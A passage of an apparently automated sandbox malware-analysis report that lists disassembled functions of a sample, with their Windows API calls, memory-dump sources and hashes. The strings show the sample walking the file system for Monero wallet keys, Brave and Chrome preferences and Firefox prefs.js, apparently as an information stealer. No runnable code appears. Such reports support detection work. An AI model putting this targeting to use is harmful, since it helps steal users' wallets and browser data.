                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: a292580e3a203f37d74eb9fad5e12a7f63c725d44ba4e43ffc21f33f9fd81bc5
                        • Instruction ID: b2ab8f1e74a25892af99e2e9a94b2a5c9e8741359008fb927ebfee35a1bbea0e
                        • Opcode Fuzzy Hash: a292580e3a203f37d74eb9fad5e12a7f63c725d44ba4e43ffc21f33f9fd81bc5
                        • Instruction Fuzzy Hash: 7AA130B190020D9BDB34DF64DC89FFA7779BF94300F048598A64D96181EB749B85CF62
                        Function 005EBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        • FindFirstFileA.KERNEL32(00000000,?,00600B32,00600B2B,00000000,?,?,?,006013F4,00600B2A), ref: 005EBEF5
                        • StrCmpCA.SHLWAPI(?,006013F8), ref: 005EBF4D
                        • StrCmpCA.SHLWAPI(?,006013FC), ref: 005EBF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005EC7BF
                        • FindClose.KERNEL32(000000FF), ref: 005EC7D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: a378b11373a3adf284a10eef2964c286b487d1bc6fc179838942f0ecf9b26a6b
                        • Instruction ID: 8fe718519058bc96eeae15382e05dd87774f39b587c76fc38f91117a433350f2
                        • Opcode Fuzzy Hash: a378b11373a3adf284a10eef2964c286b487d1bc6fc179838942f0ecf9b26a6b
                        • Instruction Fuzzy Hash: C74256B290010997CB18FB70DD5AEFE7B79BFC4300F408558B64A96195EE34AB49CB93
                        Function 005F4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 005F492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 005F4943
                        • StrCmpCA.SHLWAPI(?,00600FDC), ref: 005F4971
                        • StrCmpCA.SHLWAPI(?,00600FE0), ref: 005F4987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005F4B7D
                        • FindClose.KERNEL32(000000FF), ref: 005F4B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: 9c59904ac64220c1ab743c3ca53e8cc2013b89028db33973d077e08abc063410
                        • Instruction ID: 7c7488bfc224560d9f92ddc7f73713fccc4bcbd195e730b8b49f2fa581d3f1a6
                        • Opcode Fuzzy Hash: 9c59904ac64220c1ab743c3ca53e8cc2013b89028db33973d077e08abc063410
                        • Instruction Fuzzy Hash: 576142B1500219ABCB24EBA0DC49EFA777CBF88700F008598A64996141EB74AB45CF91
                        Function 005F4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 005F4580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F4587
                        • wsprintfA.USER32 ref: 005F45A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 005F45BD
                        • StrCmpCA.SHLWAPI(?,00600FC4), ref: 005F45EB
                        • StrCmpCA.SHLWAPI(?,00600FC8), ref: 005F4601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005F468B
                        • FindClose.KERNEL32(000000FF), ref: 005F46A0
                        • lstrcat.KERNEL32(?,0115E838), ref: 005F46C5
                        • lstrcat.KERNEL32(?,0115D880), ref: 005F46D8
                        • lstrlen.KERNEL32(?), ref: 005F46E5
                        • lstrlen.KERNEL32(?), ref: 005F46F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 671575355-2848263008
                        • Opcode ID: 939479ca269bf6dd25e9fbefd0c8a9710d1daf3d1b62ef8c53d8dc17d00410dc
                        • Instruction ID: 69ee46a46f24767edf2c345053cfd4abd0172b46ae4a3214b9c4c87a4f119b18
                        • Opcode Fuzzy Hash: 939479ca269bf6dd25e9fbefd0c8a9710d1daf3d1b62ef8c53d8dc17d00410dc
                        • Instruction Fuzzy Hash: AE5152B1540219ABCB28EB70DC89FFE777CBF58300F408599B65992190EB74DB858F92
                        Function 005F3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 005F3EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 005F3EDA
                        • StrCmpCA.SHLWAPI(?,00600FAC), ref: 005F3F08
                        • StrCmpCA.SHLWAPI(?,00600FB0), ref: 005F3F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005F406C
                        • FindClose.KERNEL32(000000FF), ref: 005F4081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: 6a654a2e2226ffa4bb7ce2e332899af7b2d54de540f95fc6b11efe82942a98e3
                        • Instruction ID: 28d16742fe7c58f114657075923dcd755c6bcbed3b25edfde60923dc7f850b1c
                        • Opcode Fuzzy Hash: 6a654a2e2226ffa4bb7ce2e332899af7b2d54de540f95fc6b11efe82942a98e3
                        • Instruction Fuzzy Hash: 005147B5900219ABCB28EBB0DC49EFA777CBF84300F008598B75996080DB75DB86CF55
                        Function 005EED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 005EED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 005EED55
                        • StrCmpCA.SHLWAPI(?,00601538), ref: 005EEDAB
                        • StrCmpCA.SHLWAPI(?,0060153C), ref: 005EEDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005EF2AE
                        • FindClose.KERNEL32(000000FF), ref: 005EF2C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 709c15dbb542f9422c0a0bc3d13963e5e46ef5fe5bb0c15e86d2b884cc1f7a9a
                        • Instruction ID: 7300d1ec06c52c914fdbea599d0cac0337f291163ef7fcf24a3dd229c2ce2a92
                        • Opcode Fuzzy Hash: 709c15dbb542f9422c0a0bc3d13963e5e46ef5fe5bb0c15e86d2b884cc1f7a9a
                        • Instruction Fuzzy Hash: AAE104B291111D5ADB18FB60CC56EFE7738BF94340F4041A9B60E62096EE746B8ACF53
                        Function 005EF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006015B8,00600D96), ref: 005EF71E
                        • StrCmpCA.SHLWAPI(?,006015BC), ref: 005EF76F
                        • StrCmpCA.SHLWAPI(?,006015C0), ref: 005EF785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005EFAB1
                        • FindClose.KERNEL32(000000FF), ref: 005EFAC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: 99857282c4398f9ef4065e4870ae99de1eb15a0974a5845885be10dabf2135d3
                        • Instruction ID: efae9169459db099594bda3b036aded09b79d4df5b96010c21231d804b678350
                        • Opcode Fuzzy Hash: 99857282c4398f9ef4065e4870ae99de1eb15a0974a5845885be10dabf2135d3
                        • Instruction Fuzzy Hash: A4B153B19001099BCB28FF60DC59EFE7B79BF94300F0085A8A54E97195EF746B49CB92
                        Function 005E16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0060510C,?,?,?,006051B4,?,?,00000000,?,00000000), ref: 005E1923
                        • StrCmpCA.SHLWAPI(?,0060525C), ref: 005E1973
                        • StrCmpCA.SHLWAPI(?,00605304), ref: 005E1989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005E1D40
                        • DeleteFileA.KERNEL32(00000000), ref: 005E1DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005E1E20
                        • FindClose.KERNEL32(000000FF), ref: 005E1E32
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: 15dc8141cb1268934695cc29b22e99014600b8dea61aa6e8325d33a56cd40a1d
                        • Instruction ID: bf585e4146703514f06c96f392773186064cc0964cd3d23931e6b0336055c238
                        • Opcode Fuzzy Hash: 15dc8141cb1268934695cc29b22e99014600b8dea61aa6e8325d33a56cd40a1d
                        • Instruction Fuzzy Hash: 131212B191011D9BCB19EB60CC59AFE7778BF94340F4041A9A60E62095EF746F89CF92
                        Function 005EDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00600C2E), ref: 005EDE5E
                        • StrCmpCA.SHLWAPI(?,006014C8), ref: 005EDEAE
                        • StrCmpCA.SHLWAPI(?,006014CC), ref: 005EDEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005EE3E0
                        • FindClose.KERNEL32(000000FF), ref: 005EE3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: acad5b0e4907cdd513c344117d5cf3936c25585c25e3056620cf88bf19f76b8b
                        • Instruction ID: e9ed3dc115a9ddf0c181778c56f30f73d3749a4c93095122ba2ca551e05dba3b
                        • Opcode Fuzzy Hash: acad5b0e4907cdd513c344117d5cf3936c25585c25e3056620cf88bf19f76b8b
                        • Instruction Fuzzy Hash: C6F1CFB181011E9ADB19EB60CC99EFE7778BF94340F4041A9A50E62095EF746B4ACF52
                        Function 0099EF15 Relevance: 14.1, Strings: 10, Instructions: 1641COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
